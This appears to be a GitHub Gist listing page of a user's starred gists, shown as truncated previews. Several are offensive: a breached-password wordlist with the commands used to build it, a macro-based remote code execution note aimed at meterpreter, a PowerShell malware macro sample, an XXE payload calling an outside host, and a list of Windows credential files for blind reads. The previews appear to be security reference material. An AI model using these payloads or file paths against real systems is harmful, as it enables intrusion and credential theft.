Y29udGFjdEBkb21pbmlrYW50YWwubWU=

Dominik Antal galaris

@scottlinux
scottlinux / breachcompilation.txt
Created Dec 19, 2017
1.4 billion password breach compilation wordlist
View breachcompilation.txt
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@mgeeky
mgeeky / Various-Macro-Based-RCEs.md
Last active Sep 22, 2020
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
View Various-Macro-Based-RCEs.md

This is a note for myself describing various Visual Basic macro construction strategies that could be used for remote code execution via a malicious document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glance before setting a payload.

All of the examples below were generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
anonymous
anonymous / gist:d0da355e5c21a122866808d37234cd5d
Created Oct 23, 2016
PowerShell malware [posted by @JohnLaTwC]
View gist:d0da355e5c21a122866808d37234cd5d
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
View structs_601_18179.h
class AccountObjectSetCheats
{
bool AutoBattle = false;
AccountobjectSetCheats Type;
int8 SlotLockCheat = 0;
};
class AccountObjectGetProfile
{
std::string Filename;
@lolzballs
lolzballs / HelloWorld.java
Created Mar 22, 2015
Hello World Enterprise Edition
View HelloWorld.java
import java.io.FileDescriptor;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
public class HelloWorld{
private static HelloWorld instance;
public static void main(String[] args){
instantiateHelloWorldMainClassAndRun();
@Marko-M
Marko-M / magento2-performance-toolkit.sh
Last active Jun 6, 2019
Magento2 performance toolkit
View magento2-performance-toolkit.sh
#!/bin/bash
# Generate sample data and trigger Magento2 performance toolkit jMeter test plan.
HOST="magento2.loc"
BASE_PATH="/"
USERS=100
RAMP_PERIOD=300
LOOPS=1
ADMIN_USER="magento2"
ADMIN_PASSWORD="magento2"
@rmondello
rmondello / gist:b933231b1fcc83a7db0b
Created Jan 7, 2015
Exporting (iCloud) Keychain and Safari credentials to a CSV file
View gist:b933231b1fcc83a7db0b

Exporting (iCloud) Keychain and Safari credentials to a CSV file

After my dad died, I wanted to be able to have access to any of his online accounts going forward. My dad was a Safari user and used iCloud Keychain to sync his credentials across his devices. I don’t want to have to keep an OS X user account around just to access his accounts, so I wanted to export his credentials to a portable file.

This is the process I used to create a CSV file of his credentials in the format “example.com,user,pass”. This portable format would be pretty easy to import into 1Password or Safari in the future.

The way I went about this isn’t great; it opens up more opportunities for apps to control one’s Mac through Accessibility APIs, it writes plaintext passwords to disk, and it could use some cleaning up. A better approach might leverage the security command line tool that ships with OS X. That said, I found this method to be a fun illustration of what’s possible us

View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@JorgeGT
JorgeGT / plotRTL1090.matlab
Last active May 18, 2020
3D visualization of air traffic through RTL-SDR and MATLAB
View plotRTL1090.matlab
%% PlotRTL1090
% 3D visualization of air traffic through RTL-SDR (dump1090) and MATLAB
% Copyright (C) 2014 Jorge Garcia Tiscar
%
% This program is free software: you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3 of the License, or
% (at your option) any later version (see LICENSE).
%% Initialize
@sckalath
sckalath / windows_blind
Created Jul 14, 2014
Windows Blind Files
View windows_blind
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system